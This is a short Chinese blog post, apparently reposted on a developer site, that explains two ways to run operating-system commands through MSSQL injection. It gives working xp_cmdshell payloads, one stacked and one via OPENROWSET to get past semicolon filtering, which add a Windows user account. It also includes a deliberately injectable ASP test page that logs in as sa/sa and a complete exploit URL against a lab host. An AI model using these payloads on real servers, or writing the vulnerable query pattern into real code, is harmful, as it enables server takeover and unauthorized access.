MSSQL注入两种执行命令的方法

内容简介：MSSQL注入两种执行命令的方法

以前遇到了一个站，Php+Mssql，不能多语句执行，就是找不到不用多语句来执行命令的方法。

其实大牛早就玩烂的东西，在自己博客做个总结笔记。

1.能多语句。

;exec xp_cmdshell('net user luan$ lu4n.com /add');--

这个方法应该都知道，没什么可说的，图也不配了。

2.不能多语句。

这个不能多语句的原因，可能是网站过滤了分号，也可能是连接数据库的时候就限制了不能多语句执行。反正以前就是觉得很蛋疼的情况了。

select * from openrowset('sqloledb','trusted_connection=yes','set fmtonly off exec master..xp_cmdshell ''net user luan lu4n.com /add''')

这种情况，只要能带入下面这个 sql 语句即可调用xp_cmdshell，或者其他的存储过程

而且这方法还能得到执行命令的回显。

我的测试环境：

Win2003

IIS6

SqlServer 2000

mssqli.asp:

<%
 dim sql
 sql ="select * from spt_values where name='"&request("name")&"'"
 sql = replace(sql,";","")
 set conn=server.createobject("adodb.connection")
 conn.open "provider=sqloledb;source=local;uid=sa;pwd=sa;database=master"
 set rs=server.createobject("adodb.recordset")
 rs.open sql,conn,3,2
 Do While not rs.EOF
  response.write rs("name")
  rs.MoveNext
 Loop
 rs.close()
 conn.close()
%>

测试前：

exp1:

http://192.168.52.136/mssqli.asp?name=rpc'and 'lu4n.com'=(select * from openrowset('sqloledb','trusted_connection=yes','set fmtonly off exec master..xp_cmdshell ''net user luan lu4n.com /add'''))--

截图：

看截图是报错了，但是子查询已经完成了，命令已经执行了，只是直接这样子拿不到回显。报错注入如何回显可以参考大牛的 文章

测试后：

sqlmap最新版里居然没有这个方法，而我在国内的很老的文章里就看到了这个方法…

sqlmap里有个功能mssql注入能切换身份来执行sql语句，但是需要其他用户的账号密码。

以上所述就是小编给大家介绍的《MSSQL注入两种执行命令的方法》，希望对大家有所帮助，如果大家有任何疑问请给我留言，小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持！

查看所有标签

猜你喜欢:

• 挖洞姿势：浅析命令注入漏洞
• Cookie篡改与命令注入
• Java OS 命令注入学习笔记
• 【缺陷周话】第6期：命令注入
• 《缺陷周话》第6期：命令注入
• Bypass一些命令注入限制的姿势

本站部分资源来源于网络，本站转载出于传递更多信息之目的，版权归原作者或者来源机构所有，如转载稿涉及版权问题，请联系我们。